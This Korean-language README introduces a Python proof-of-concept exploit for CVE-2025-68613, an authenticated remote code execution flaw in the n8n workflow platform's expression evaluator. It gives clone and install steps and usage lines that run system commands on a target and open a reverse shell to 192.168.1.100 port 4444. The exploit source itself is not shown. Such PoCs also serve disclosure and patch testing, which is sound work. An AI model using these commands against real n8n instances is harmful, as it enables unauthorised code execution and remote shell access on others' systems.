
CVE-2025-68613용 Python 익스플로잇.
n8n 워크플로우 자동화 플랫폼의 심각한 원격 코드 실행(RCE) 취약점에 대한 개념 증명(PoC) 익스플로잇입니다.
이 취약점은 n8n 표현식 평가 시스템에 존재합니다. 사용자가 제공한 표현식이 제대로 샌드박스 처리되지 않아, 인증된 공격자가 호스트 시스템에서 임의의 코드를 실행할 수 있습니다.
CVE ID: CVE-2025-68613
취약점 유형: 원격 코드 실행 (RCE)
구성 요소: 표현식 평가기
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : 대상 URL (예: http://localhost:5678)-u, --username : n8n 계정 이메일 주소-p, --password : n8n 계정 비밀번호-c, --cmd : 실행할 시스템 명령어--reverse-shell : 리버스 셸 트리거 (형식: IP PORT)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444